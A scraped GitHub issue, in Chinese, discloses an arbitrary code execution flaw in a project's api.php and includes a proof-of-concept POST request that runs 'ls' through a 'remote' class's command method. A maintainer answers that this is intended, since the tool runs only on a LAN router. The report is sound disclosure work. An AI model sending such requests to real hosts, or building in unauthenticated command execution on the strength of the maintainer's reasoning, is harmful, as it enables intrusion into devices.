Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
在api.php中使用了eval函数,其他几个参数可控制导致任意代码执行。 $c = new $o(); $o = _GET("class",'unknow'); $f = _GET('function','unknow'); $agrs = implode(',',$_POST); 可以看出$o是一个对象,$c是$o对象的实例化,$f是对象的成员方法,$agrs是post传入的参数,也就是成员方法的参数。
poc:
POST /6/api.php?function=command&class=remote HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded
cc='ls'
跟踪执行流程,实际是执行了下面的代码,导致任意代码执行漏洞。 $c = new remote; $j = $c->command('ls');
The text was updated successfully, but these errors were encountered:
此項目設計就只在路由器運行,受到局域網保護。 所以這裡設計允許了執行任意代碼。
除非你家小孩在你家 WI-FI 下惡意攻擊你。 當然,WI-FI 密碼洩漏而導致的攻擊是不在設計範圍之內。
Sorry, something went wrong.
No branches or pull requests
在api.php中使用了eval函数,其他几个参数可控制导致任意代码执行。
$c = new $o();
$o = _GET("class",'unknow');
$f = _GET('function','unknow');
$agrs = implode(',',$_POST);
可以看出$o是一个对象,$c是$o对象的实例化,$f是对象的成员方法,$agrs是post传入的参数,也就是成员方法的参数。
poc:
POST /6/api.php?function=command&class=remote HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
cc='ls'
跟踪执行流程,实际是执行了下面的代码,导致任意代码执行漏洞。
$c = new remote;
$j = $c->command('ls');
The text was updated successfully, but these errors were encountered: